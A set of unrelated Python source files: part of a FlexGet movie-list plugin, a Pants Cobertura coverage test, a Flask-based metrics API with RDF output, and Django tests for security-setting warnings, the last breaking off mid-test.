MovieListID.id_name == id_name,
MovieListID.id_value == entry[id_name]))
.first())
if res:
log.debug('found movie %s', res)
return res
# Fall back to title/year match
if not entry.get('movie_name'):
self._parse_title(entry)
if entry.get('movie_name'):
name = entry['movie_name']
year = entry.get('movie_year') if entry.get('movie_year') else None
else:
log.warning('Could not get a movie name, skipping')
return
log.debug('trying to match movie based of name: %s and year: %s', name, year)
res = (self._db_list(session).movies.filter(func.lower(MovieListMovie.title) == name.lower())
.filter(MovieListMovie.year == year).first())
if res:
log.debug('found movie %s', res)
return res
@staticmethod
def _parse_title(entry):
parser = get_plugin_by_name('parsing').instance.parse_movie(data=entry['title'])
if parser and parser.valid:
parser.name = normalize_name(remove_dirt(parser.name))
entry.update(parser.fields)
@property
def immutable(self):
return False
@property
def online(self):
"""
Set the online status of the plugin, online plugin should be treated
differently in certain situations, like test mode
"""
return False
@with_session
def get(self, entry, session):
match = self._find_entry(entry=entry, session=session)
return match.to_entry() if match else None
class PluginMovieList(object):
"""Remove all accepted elements from your trakt.tv watchlist/library/seen or custom list."""
schema = {'oneOf': [
{'type': 'string'},
{'type': 'object',
'properties': {
'list_name': {'type': 'string'},
'strip_year': {'type': 'boolean'}
},
'required': ['list_name'],
'additionalProperties': False
}
]}
@staticmethod
def get_list(config):
return MovieList(config)
def on_task_input(self, task, config):
return list(MovieList(config))
@event('plugin.register')
def register_plugin():
plugin.register(PluginMovieList, 'movie_list', api_ver=2, groups=['list'])
@with_session
def get_movies_by_list_id(list_id, start=None, stop=None, order_by='added', descending=False,
session=None):
query = session.query(MovieListMovie).filter(MovieListMovie.list_id == list_id)
if descending:
query = query.order_by(getattr(MovieListMovie, order_by).desc())
else:
query = query.order_by(getattr(MovieListMovie, order_by))
return query.slice(start, stop).all()
@with_session
def get_movie_lists(name=None, session=None):
log.debug('retrieving movie lists')
query = session.query(MovieListList)
if name:
log.debug('filtering by name %s', name)
query = query.filter(MovieListList.name.contains(name))
return query.all()
@with_session
def get_list_by_exact_name(name, session=None):
log.debug('returning list with name %s', name)
return session.query(MovieListList).filter(func.lower(MovieListList.name) == name.lower()).one()
@with_session
def get_list_by_id(list_id, session=None):
log.debug('fetching list with id %d', list_id)
return session.query(MovieListList).filter(MovieListList.id == list_id).one()
@with_session
def get_movie_by_id(list_id, movie_id, session=None):
log.debug('fetching movie with id %d from list id %d', movie_id, list_id)
return session.query(MovieListMovie).filter(
and_(MovieListMovie.id == movie_id, MovieListMovie.list_id == list_id)).one()
@with_session
def get_movie_by_title_and_year(list_id, title, year=None, session=None):
movie_list = get_list_by_id(list_id=list_id, session=session)
if movie_list:
log.debug('searching for movie %s in list %d', title, list_id)
return session.query(MovieListMovie).filter(
and_(
func.lower(MovieListMovie.title) == title.lower(),
MovieListMovie.year == year,
MovieListMovie.list_id == list_id)
).one_or_none()
@with_session
def get_movie_identifier(identifier_name, identifier_value, movie_id=None, session=None):
db_movie_id = session.query(MovieListID).filter(
and_(MovieListID.id_name == identifier_name,
MovieListID.id_value == identifier_value,
MovieListID.movie_id == movie_id)).first()
if db_movie_id:
log.debug('fetching movie identifier %s: %s', db_movie_id.id_name, db_movie_id.id_value)
return db_movie_id
@with_session
def get_db_movie_identifiers(identifier_list, movie_id=None, session=None):
db_movie_ids = []
for identifier in identifier_list:
for key, value in identifier.items():
if key in MovieListBase().supported_ids:
db_movie_id = get_movie_identifier(identifier_name=key, identifier_value=value, movie_id=movie_id,
session=session)
if not db_movie_id:
log.debug('creating movie identifier %s: %s', key, value)
db_movie_id = MovieListID(id_name=key, id_value=value, movie_id=movie_id)
session.merge(db_movie_id)
db_movie_ids.append(db_movie_id)
return db_movie_ids
|
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from collections import defaultdict
from pants.backend.jvm.targets.annotation_processor import AnnotationProcessor
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.targets.jvm_app import JvmApp
from pants.backend.jvm.targets.jvm_binary import JvmBinary
from pants.backend.jvm.tasks.classpath_products import ClasspathProducts
from pants.backend.jvm.tasks.coverage.cobertura import Cobertura
from pants.backend.jvm.tasks.coverage.manager import CodeCoverageSettings
from pants.java.jar.jar_dependency import JarDependency
from pants_test.base_test import BaseTest
class attrdict(dict):
"""Allows entries in the dictionary to be accessed like a property, in order to spoof options.
:API: public
"""
def __getattr__(self, key):
return self.get(key)
class fake_log(object):
"""
:API: public
"""
def debug(self, string):
"""
:API: public
"""
pass
def warn(self, string):
"""
:API: public
"""
pass
class MockSystemCalls(object):
"""
:API: public
"""
def __init__(self):
self.copy2_calls = defaultdict(list)
self.copytree_calls = defaultdict(list)
self.safe_makedir_calls = []
def safe_md(self, dir, clean):
"""
:API: public
"""
assert clean is True
self.safe_makedir_calls.append(dir)
class TestCobertura(BaseTest):
"""
:API: public
"""
def get_settings(self, options, workdir, log, syscalls):
return CodeCoverageSettings(
options,
None,
self.pants_workdir,
None,
None,
fake_log(),
copy2=lambda frm, to: syscalls.copy2_calls[frm].append(to),
copytree=lambda frm, to: syscalls.copytree_calls[frm].append(to),
is_file=lambda file_name: file_name.endswith('.jar'),
safe_md=syscalls.safe_md)
def setUp(self):
"""
:API: public
"""
super(TestCobertura, self).setUp()
self.pants_workdir = 'workdir'
self.conf = 'default'
self.factory = Cobertura.Factory("test_scope", [])
self.jar_lib = self.make_target(spec='3rdparty/jvm/org/example:foo',
target_type=JarLibrary,
jars=[JarDependency(org='org.example', name='foo', rev='1.0.0'),
JarDependency(org='org.pantsbuild', name='bar',
rev='2.0.0', ext='zip')])
self.binary_target = self.make_target(spec='//foo:foo-binary',
target_type=JvmBinary,
source='Foo.java',
dependencies=[self.jar_lib])
self.app_target = self.make_target(spec='//foo:foo-app',
target_type=JvmApp,
basename='FooApp',
dependencies=[self.binary_target])
self.java_target = self.make_target(spec='//foo:foo-java',
target_type=JavaLibrary,
sources=[])
self.annotation_target = self.make_target(spec='//foo:foo-anno',
target_type=AnnotationProcessor)
def _add_for_target(self, products, target, path):
products.add_for_target(target, [(self.conf, self.pants_workdir + path)])
def _assert_calls(self, call_collection, frm, to):
calls_for_target = call_collection[self.pants_workdir + frm]
self.assertEquals(len(calls_for_target), 1, "Should be 1 call for the_target's path.")
self.assertEquals(calls_for_target[0], self.pants_workdir + to,
'Should copy from/to correct paths.')
def _assert_target_copy(self, coverage, frm, to):
self._assert_calls(coverage.copy2_calls, frm, to)
def _assert_target_copytree(self, coverage, frm, to):
self._assert_calls(coverage.copytree_calls, frm, to)
def test_skips_non_coverage_targets(self):
"""
:API: public
"""
options = attrdict(coverage=True, coverage_jvm_options=[])
syscalls = MockSystemCalls()
settings = self.get_settings(options, self.pants_workdir, fake_log(), syscalls)
classpath_products = ClasspathProducts(self.pants_workdir)
self._add_for_target(classpath_products, self.jar_lib, '/jar/lib/classpath')
self._add_for_target(classpath_products, self.binary_target, '/binary/target/classpath')
self._add_for_target(classpath_products, self.app_target, '/app/target/classpath')
self._add_for_target(classpath_products, self.java_target, '/java/target/classpath.jar')
Cobertura.initialize_instrument_classpath(
settings,
[self.jar_lib, self.binary_target, self.app_target, self.java_target],
classpath_products)
self.assertEquals(len(syscalls.copy2_calls), 1,
'Should only be 1 call for the single java_library target.')
self._assert_target_copy(syscalls, '/java/target/classpath.jar',
'/coverage/classes/foo.foo-java/0')
self.assertEquals(len(syscalls.copytree_calls), 0,
'Should be no copytree calls when targets are not coverage targets.')
def test_target_with_multiple_path_entries(self):
"""
:API: public
"""
options = attrdict(coverage=True, coverage_jvm_options=[])
syscalls = MockSystemCalls()
settings = self.get_settings(options, self.pants_workdir, fake_log(), syscalls)
classpath_products = ClasspathProducts(self.pants_workdir)
self._add_for_target(classpath_products, self.java_target, '/java/target/first.jar')
self._add_for_target(classpath_products, self.java_target, '/java/target/second.jar')
self._add_for_target(classpath_products, self.java_target, '/java/target/third.jar')
Cobertura.initialize_instrument_classpath(settings, [self.java_target], classpath_products)
self.assertEquals(len(syscalls.copy2_calls), 3,
'Should be 3 call for the single java_library target.')
self._assert_target_copy(syscalls, '/java/target/first.jar', '/coverage/classes/foo.foo-java/0')
self._assert_target_copy(syscalls, '/java/target/second.jar',
'/coverage/classes/foo.foo-java/1')
self._assert_target_copy(syscalls, '/java/target/third.jar',
'/coverage/classes/foo.foo-java/2')
self.assertEquals(len(syscalls.copytree_calls), 0,
'Should be no copytree calls when targets are not coverage targets.')
def test_target_annotation_processor(self):
"""
:API: public
"""
options = attrdict(coverage=True, coverage_jvm_options=[])
syscalls = MockSystemCalls()
settings = self.get_settings(options, self.pants_workdir, fake_log(), syscalls)
classpath_products = ClasspathProducts(self.pants_workdir)
self._add_for_target(classpath_products, self.annotation_target, '/anno/target/dir')
Cobertura.initialize_instrument_classpath(settings, [self.annotation_target], classpath_products)
self.assertEquals(len(syscalls.copy2_calls), 0,
'Should be 0 call for the single annotation target.')
self._assert_target_copytree(syscalls, '/anno/target/dir', '/coverage/classes/foo.foo-anno/0')
def _get_fake_execute_java(self):
def _fake_execute_java(classpath, main, jvm_options, args, workunit_factory, workunit_name):
# at some point we could add assertions here for expected paramerter values
pass
return _fake_execute_java
def test_coverage_forced(self):
"""
:API: public
"""
options = attrdict(coverage=True, coverage_force=True, coverage_jvm_options=[])
syscalls = MockSystemCalls()
settings = self.get_settings(options, self.pants_workdir, fake_log(), syscalls)
cobertura = self.factory.create(settings, [self.binary_target], self._get_fake_execute_java())
self.assertEquals(cobertura.should_report(), False, 'Without instrumentation step, there should be nothing to instrument or report')
# simulate an instrument step with results
cobertura._nothing_to_instrument = False
self.assertEquals(cobertura.should_report(), True, 'Should do reporting when there is something to instrument')
exception = Exception("uh oh, test failed")
self.assertEquals(cobertura.should_report(exception), True, 'We\'ve forced coverage, so should report.')
no_force_options = attrdict(coverage=True, coverage_force=False, coverage_jvm_options=[])
no_force_settings = self.get_settings(no_force_options, self.pants_workdir, fake_log(), syscalls)
no_force_cobertura = self.factory.create(no_force_settings, [self.binary_target], self._get_fake_execute_java())
no_force_cobertura._nothing_to_instrument = False
self.assertEquals(no_force_cobertura.should_report(exception), False, 'Don\'t report after a failure if coverage isn\'t forced.')
|
|
"""
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
This file is part of the Smart Developer Hub Project:
http://www.smartdeveloperhub.org
Center for Open Middleware
http://www.centeropenmiddleware.com/
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Copyright (C) 2015 Center for Open Middleware.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
"""
__author__ = 'Fernando Serena'
from agora.provider.server.base import AgoraApp, get_accept
import calendar
from datetime import datetime
from agora.provider.server.base import APIError, NotFound
from flask import make_response, url_for
from flask_negotiate import produces
from rdflib.namespace import Namespace, RDF
from rdflib import Graph, URIRef, Literal
from functools import wraps
from sdh.metrics.jobs.calculus import check_triggers
import pkg_resources
try:
pkg_resources.declare_namespace(__name__)
except ImportError:
import pkgutil
__path__ = pkgutil.extend_path(__path__, __name__)
METRICS = Namespace('http://www.smartdeveloperhub.org/vocabulary/metrics#')
PLATFORM = Namespace('http://www.smartdeveloperhub.org/vocabulary/platform#')
class MetricsGraph(Graph):
def __init__(self):
super(MetricsGraph, self).__init__()
self.bind('metrics', METRICS)
self.bind('platform', PLATFORM)
@staticmethod
def __decide_serialization_format():
mimes = get_accept()
if 'text/turtle' in mimes:
return 'text/turtle', 'turtle'
elif 'text/rdf+n3' in mimes:
return 'text/rdf+n3', 'n3'
else:
return 'application/xml', 'xml'
def serialize(self, destination=None, format="xml",
base=None, encoding=None, **args):
content_type, ex_format = self.__decide_serialization_format()
return content_type, super(MetricsGraph, self).serialize(destination=destination, format=ex_format,
base=base, encoding=encoding, **args)
class MetricsApp(AgoraApp):
@staticmethod
def __get_metric_definition_graph(md):
g = MetricsGraph()
me = URIRef(url_for('__get_definition', md=md, _external=True))
g.add((me, RDF.type, METRICS.MetricDefinition))
g.add((me, PLATFORM.identifier, Literal(md)))
return g
@staticmethod
def __return_graph(g):
content_type, rdf = g.serialize(format=format)
response = make_response(rdf)
response.headers['Content-Type'] = content_type
return response
@produces('text/turtle', 'text/rdf+n3', 'application/rdf+xml', 'application/xml')
def __get_definition(self, md):
if md not in self.metrics.values():
raise NotFound('Unknown metric definition')
g = self.__get_metric_definition_graph(md)
return self.__return_graph(g)
@produces('text/turtle', 'text/rdf+n3', 'application/rdf+xml', 'application/xml')
def __root(self):
g = MetricsGraph()
me = URIRef(url_for('__root', _external=True))
g.add((me, RDF.type, METRICS.MetricService))
for mf in self.metrics.keys():
endp = URIRef(url_for(mf, _external=True))
g.add((me, METRICS.hasEndpoint, endp))
mident = self.metrics[mf]
md = URIRef(url_for('__get_definition', md=mident, _external=True))
g.add((me, METRICS.calculatesMetric, md))
g.add((md, RDF.type, METRICS.MetricDefinition))
g.add((md, PLATFORM.identifier, Literal(mident)))
return self.__return_graph(g)
def __init__(self, name, config_class):
super(MetricsApp, self).__init__(name, config_class)
self.metrics = {}
self.route('/metrics')(self.__root)
self.route('/metrics/definitions/<md>')(self.__get_definition)
self.store = None
def __metric_rdfizer(self, func):
g = Graph()
g.bind('metrics', METRICS)
g.bind('platform', PLATFORM)
me = URIRef(url_for(func, _external=True))
g.add((me, RDF.type, METRICS.MetricEndpoint))
g.add((me, METRICS.supports, URIRef(url_for('__get_definition', md=self.metrics[func], _external=True))))
return g
def __add_context(self, f):
@wraps(f)
def wrapper(*args, **kwargs):
data = f(*args, **kwargs)
context = kwargs
context['timestamp'] = calendar.timegm(datetime.utcnow().timetuple())
if isinstance(data, tuple):
context.update(data[0])
data = data[1]
if type(data) == list:
context['size'] = len(data)
return context, data
return wrapper
def metric(self, path, handler, mid):
def decorator(f):
f = self.__add_context(f)
f = self.register('/metrics' + path, handler, self.__metric_rdfizer)(f)
self.metrics[f.func_name] = mid
return f
return decorator
def calculus(self, triggers=None):
def decorator(f):
from sdh.metrics.jobs.calculus import add_calculus
add_calculus(f, triggers)
return f
return decorator
@staticmethod
def _get_repo_context(request):
rid = request.args.get('rid', None)
if rid is None:
raise APIError('A repository ID is required')
return rid
@staticmethod
def _get_user_context(request):
uid = request.args.get('uid', None)
if uid is None:
raise APIError('A user ID is required')
return uid
@staticmethod
def _get_basic_context(request):
begin = request.args.get('begin', None)
if begin is not None:
begin = int(begin)
end = request.args.get('end', None)
if end is not None:
end = int(end)
if end is not None and end is not None:
if end < begin:
raise APIError('Begin cannot be higher than end')
return {'begin': begin, 'end': end}
@staticmethod
def _get_tbd_context(request):
begin = int(request.args.get('begin', 0))
end = int(request.args.get('end', calendar.timegm(datetime.utcnow().timetuple())))
if end < begin:
raise APIError('Begin cannot be higher than end')
return {'begin': begin, 'end': end}
def _get_metric_context(self, request):
_max = request.args.get('max', 1)
context = self._get_basic_context(request)
context['max'] = max(0, int(_max))
if context['begin'] is not None and context['end'] is not None:
context['step'] = context['end'] - context['begin']
else:
context['step'] = None
if context['max'] and context['step'] is not None:
context['step'] /= context['max']
if not context['step']:
raise APIError('Resulting step is 0')
return context
def orgmetric(self, path, aggr, mid):
def context(request):
return [], self._get_metric_context(request)
return lambda f: self.metric(path, context, '{}-org-{}'.format(aggr, mid))(f)
def repometric(self, path, aggr, mid):
def context(request):
return [self._get_repo_context(request)], self._get_metric_context(request)
return lambda f: self.metric(path, context, '{}-repo-{}'.format(aggr, mid))(f)
def usermetric(self, path, aggr, mid):
def context(request):
return [self._get_user_context(request)], self._get_metric_context(request)
return lambda f: self.metric(path, context, '{}-user-{}'.format(aggr, mid))(f)
def repousermetric(self, path, aggr, mid):
def context(request):
return [self._get_repo_context(request), self._get_user_context(request)], self._get_metric_context(request)
return lambda f: self.metric(path, context, '{}-repo-user-{}'.format(aggr, mid))(f)
def orgtbd(self, path, mid):
def context(request):
return [], self._get_tbd_context(request)
return lambda f: self.metric(path, context, 'tbd-org-' + mid)(f)
def repotbd(self, path, mid):
def context(request):
return [self._get_repo_context(request)], self._get_tbd_context(request)
return lambda f: self.metric(path, context, 'tbd-repo-' + mid)(f)
def usertbd(self, path, mid):
def context(request):
return [self._get_user_context(request)], self._get_tbd_context(request)
return lambda f: self.metric(path, context, 'tbd-user-' + mid)(f)
def userrepotbd(self, path, mid):
def context(request):
return [self._get_repo_context(request), self._get_user_context(request)], self._get_tbd_context(request)
return lambda f: self.metric(path, context, 'tbd-repo-user-' + mid)(f)
def calculate(self, collector, quad, stop_event):
self.store.execute_pending()
check_triggers(collector, quad, stop_event)
self.store.execute_pending()
def run(self, host=None, port=None, debug=None, **options):
tasks = options.get('tasks', [])
tasks.append(self.calculate)
options['tasks'] = tasks
super(MetricsApp, self).run(host, port, debug, **options)
|
|
from django.conf import settings
from django.core.checks.security import base, csrf, sessions
from django.test import SimpleTestCase
from django.test.utils import override_settings
class CheckSessionCookieSecureTest(SimpleTestCase):
@override_settings(
SESSION_COOKIE_SECURE=False,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=[],
)
def test_session_cookie_secure_with_installed_app(self):
"""
Warn if SESSION_COOKIE_SECURE is off and "django.contrib.sessions" is
in INSTALLED_APPS.
"""
self.assertEqual(sessions.check_session_cookie_secure(None), [sessions.W010])
@override_settings(
SESSION_COOKIE_SECURE=False,
INSTALLED_APPS=[],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_secure_with_middleware(self):
"""
Warn if SESSION_COOKIE_SECURE is off and
"django.contrib.sessions.middleware.SessionMiddleware" is in
MIDDLEWARE.
"""
self.assertEqual(sessions.check_session_cookie_secure(None), [sessions.W011])
@override_settings(
SESSION_COOKIE_SECURE=False,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_secure_both(self):
"""
If SESSION_COOKIE_SECURE is off and we find both the session app and
the middleware, provide one common warning.
"""
self.assertEqual(sessions.check_session_cookie_secure(None), [sessions.W012])
@override_settings(
SESSION_COOKIE_SECURE=True,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_secure_true(self):
"""
If SESSION_COOKIE_SECURE is on, there's no warning about it.
"""
self.assertEqual(sessions.check_session_cookie_secure(None), [])
class CheckSessionCookieHttpOnlyTest(SimpleTestCase):
@override_settings(
SESSION_COOKIE_HTTPONLY=False,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=[],
)
def test_session_cookie_httponly_with_installed_app(self):
"""
Warn if SESSION_COOKIE_HTTPONLY is off and "django.contrib.sessions"
is in INSTALLED_APPS.
"""
self.assertEqual(sessions.check_session_cookie_httponly(None), [sessions.W013])
@override_settings(
SESSION_COOKIE_HTTPONLY=False,
INSTALLED_APPS=[],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_httponly_with_middleware(self):
"""
Warn if SESSION_COOKIE_HTTPONLY is off and
"django.contrib.sessions.middleware.SessionMiddleware" is in
MIDDLEWARE.
"""
self.assertEqual(sessions.check_session_cookie_httponly(None), [sessions.W014])
@override_settings(
SESSION_COOKIE_HTTPONLY=False,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_httponly_both(self):
"""
If SESSION_COOKIE_HTTPONLY is off and we find both the session app and
the middleware, provide one common warning.
"""
self.assertEqual(sessions.check_session_cookie_httponly(None), [sessions.W015])
@override_settings(
SESSION_COOKIE_HTTPONLY=True,
INSTALLED_APPS=["django.contrib.sessions"],
MIDDLEWARE=['django.contrib.sessions.middleware.SessionMiddleware'],
)
def test_session_cookie_httponly_true(self):
"""
If SESSION_COOKIE_HTTPONLY is on, there's no warning about it.
"""
self.assertEqual(sessions.check_session_cookie_httponly(None), [])
class CheckCSRFMiddlewareTest(SimpleTestCase):
@override_settings(MIDDLEWARE=[])
def test_no_csrf_middleware(self):
"""
Warn if CsrfViewMiddleware isn't in MIDDLEWARE.
"""
self.assertEqual(csrf.check_csrf_middleware(None), [csrf.W003])
@override_settings(MIDDLEWARE=['django.middleware.csrf.CsrfViewMiddleware'])
def test_with_csrf_middleware(self):
self.assertEqual(csrf.check_csrf_middleware(None), [])
class CheckCSRFCookieSecureTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.csrf.CsrfViewMiddleware"],
CSRF_COOKIE_SECURE=False,
)
def test_with_csrf_cookie_secure_false(self):
"""
Warn if CsrfViewMiddleware is in MIDDLEWARE but
CSRF_COOKIE_SECURE isn't True.
"""
self.assertEqual(csrf.check_csrf_cookie_secure(None), [csrf.W016])
@override_settings(
MIDDLEWARE=["django.middleware.csrf.CsrfViewMiddleware"],
CSRF_USE_SESSIONS=True,
CSRF_COOKIE_SECURE=False,
)
def test_use_sessions_with_csrf_cookie_secure_false(self):
"""
No warning if CSRF_COOKIE_SECURE isn't True while CSRF_USE_SESSIONS
is True.
"""
self.assertEqual(csrf.check_csrf_cookie_secure(None), [])
@override_settings(MIDDLEWARE=[], CSRF_COOKIE_SECURE=False)
def test_with_csrf_cookie_secure_false_no_middleware(self):
"""
No warning if CsrfViewMiddleware isn't in MIDDLEWARE, even if
CSRF_COOKIE_SECURE is False.
"""
self.assertEqual(csrf.check_csrf_cookie_secure(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.csrf.CsrfViewMiddleware"],
CSRF_COOKIE_SECURE=True,
)
def test_with_csrf_cookie_secure_true(self):
self.assertEqual(csrf.check_csrf_cookie_secure(None), [])
class CheckSecurityMiddlewareTest(SimpleTestCase):
@override_settings(MIDDLEWARE=[])
def test_no_security_middleware(self):
"""
Warn if SecurityMiddleware isn't in MIDDLEWARE.
"""
self.assertEqual(base.check_security_middleware(None), [base.W001])
@override_settings(MIDDLEWARE=['django.middleware.security.SecurityMiddleware'])
def test_with_security_middleware(self):
self.assertEqual(base.check_security_middleware(None), [])
class CheckStrictTransportSecurityTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_SECONDS=0,
)
def test_no_sts(self):
"""
Warn if SECURE_HSTS_SECONDS isn't > 0.
"""
self.assertEqual(base.check_sts(None), [base.W004])
@override_settings(MIDDLEWARE=[], SECURE_HSTS_SECONDS=0)
def test_no_sts_no_middleware(self):
"""
Don't warn if SECURE_HSTS_SECONDS isn't > 0 and SecurityMiddleware isn't
installed.
"""
self.assertEqual(base.check_sts(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_SECONDS=3600,
)
def test_with_sts(self):
self.assertEqual(base.check_sts(None), [])
class CheckStrictTransportSecuritySubdomainsTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_INCLUDE_SUBDOMAINS=False,
SECURE_HSTS_SECONDS=3600,
)
def test_no_sts_subdomains(self):
"""
Warn if SECURE_HSTS_INCLUDE_SUBDOMAINS isn't True.
"""
self.assertEqual(base.check_sts_include_subdomains(None), [base.W005])
@override_settings(
MIDDLEWARE=[],
SECURE_HSTS_INCLUDE_SUBDOMAINS=False,
SECURE_HSTS_SECONDS=3600,
)
def test_no_sts_subdomains_no_middleware(self):
"""
Don't warn if SecurityMiddleware isn't installed.
"""
self.assertEqual(base.check_sts_include_subdomains(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_SSL_REDIRECT=False,
SECURE_HSTS_SECONDS=None,
)
def test_no_sts_subdomains_no_seconds(self):
"""
Don't warn if SECURE_HSTS_SECONDS isn't set.
"""
self.assertEqual(base.check_sts_include_subdomains(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_INCLUDE_SUBDOMAINS=True,
SECURE_HSTS_SECONDS=3600,
)
def test_with_sts_subdomains(self):
self.assertEqual(base.check_sts_include_subdomains(None), [])
class CheckStrictTransportSecurityPreloadTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_PRELOAD=False,
SECURE_HSTS_SECONDS=3600,
)
def test_no_sts_preload(self):
"""
Warn if SECURE_HSTS_PRELOAD isn't True.
"""
self.assertEqual(base.check_sts_preload(None), [base.W021])
@override_settings(MIDDLEWARE=[], SECURE_HSTS_PRELOAD=False, SECURE_HSTS_SECONDS=3600)
def test_no_sts_preload_no_middleware(self):
"""
Don't warn if SecurityMiddleware isn't installed.
"""
self.assertEqual(base.check_sts_preload(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_SSL_REDIRECT=False,
SECURE_HSTS_SECONDS=None,
)
def test_no_sts_preload_no_seconds(self):
"""
Don't warn if SECURE_HSTS_SECONDS isn't set.
"""
self.assertEqual(base.check_sts_preload(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_HSTS_PRELOAD=True,
SECURE_HSTS_SECONDS=3600,
)
def test_with_sts_preload(self):
self.assertEqual(base.check_sts_preload(None), [])
class CheckXFrameOptionsMiddlewareTest(SimpleTestCase):
@override_settings(MIDDLEWARE=[])
def test_middleware_not_installed(self):
"""
Warn if XFrameOptionsMiddleware isn't in MIDDLEWARE.
"""
self.assertEqual(base.check_xframe_options_middleware(None), [base.W002])
@override_settings(MIDDLEWARE=["django.middleware.clickjacking.XFrameOptionsMiddleware"])
def test_middleware_installed(self):
self.assertEqual(base.check_xframe_options_middleware(None), [])
class CheckXFrameOptionsDenyTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.clickjacking.XFrameOptionsMiddleware"],
X_FRAME_OPTIONS='SAMEORIGIN',
)
def test_x_frame_options_not_deny(self):
"""
Warn if XFrameOptionsMiddleware is in MIDDLEWARE but
X_FRAME_OPTIONS isn't 'DENY'.
"""
self.assertEqual(base.check_xframe_deny(None), [base.W019])
@override_settings(MIDDLEWARE=[], X_FRAME_OPTIONS='SAMEORIGIN')
def test_middleware_not_installed(self):
"""
No error if XFrameOptionsMiddleware isn't in MIDDLEWARE even if
X_FRAME_OPTIONS isn't 'DENY'.
"""
self.assertEqual(base.check_xframe_deny(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.clickjacking.XFrameOptionsMiddleware"],
X_FRAME_OPTIONS='DENY',
)
def test_xframe_deny(self):
self.assertEqual(base.check_xframe_deny(None), [])
class CheckContentTypeNosniffTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_CONTENT_TYPE_NOSNIFF=False,
)
def test_no_content_type_nosniff(self):
"""
Warn if SECURE_CONTENT_TYPE_NOSNIFF isn't True.
"""
self.assertEqual(base.check_content_type_nosniff(None), [base.W006])
@override_settings(MIDDLEWARE=[], SECURE_CONTENT_TYPE_NOSNIFF=False)
def test_no_content_type_nosniff_no_middleware(self):
"""
Don't warn if SECURE_CONTENT_TYPE_NOSNIFF isn't True and
SecurityMiddleware isn't in MIDDLEWARE.
"""
self.assertEqual(base.check_content_type_nosniff(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_CONTENT_TYPE_NOSNIFF=True,
)
def test_with_content_type_nosniff(self):
self.assertEqual(base.check_content_type_nosniff(None), [])
class CheckSSLRedirectTest(SimpleTestCase):
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_SSL_REDIRECT=False,
)
def test_no_ssl_redirect(self):
"""
Warn if SECURE_SSL_REDIRECT isn't True.
"""
self.assertEqual(base.check_ssl_redirect(None), [base.W008])
@override_settings(MIDDLEWARE=[], SECURE_SSL_REDIRECT=False)
def test_no_ssl_redirect_no_middleware(self):
"""
Don't warn if SECURE_SSL_REDIRECT is False and SecurityMiddleware isn't
installed.
"""
self.assertEqual(base.check_ssl_redirect(None), [])
@override_settings(
MIDDLEWARE=["django.middleware.security.SecurityMiddleware"],
SECURE_SSL_REDIRECT=True,
)
def test_with_ssl_redirect(self):
self.assertEqual(base.check_ssl_redirect(None), [])
class CheckSecretKeyTest(SimpleTestCase):
@override_settings(SECRET_KEY=('abcdefghijklmnopqrstuvwx' * 2) + 'ab')
def test_okay_secret_key(self):
self.assertEqual(len(settings.SECRET_KEY), base.SECRET_KEY_MIN_LENGTH)
self.assertGreater(len(set(settings.SECRET_KEY)), base.SECRET_KEY_MIN_UNIQUE_CHARACTERS)
self.assertEqual(base.check_secret_key(None), [])
@override_settings(SECRET_KEY='')
def test_empty_secret_key(self):
self.assertEqual(base.check_secret_key(None), [base.W009])
@override_settings(SECRET_KEY=None)
def test_missing_secret_key(self):
del settings.SECRET_KEY
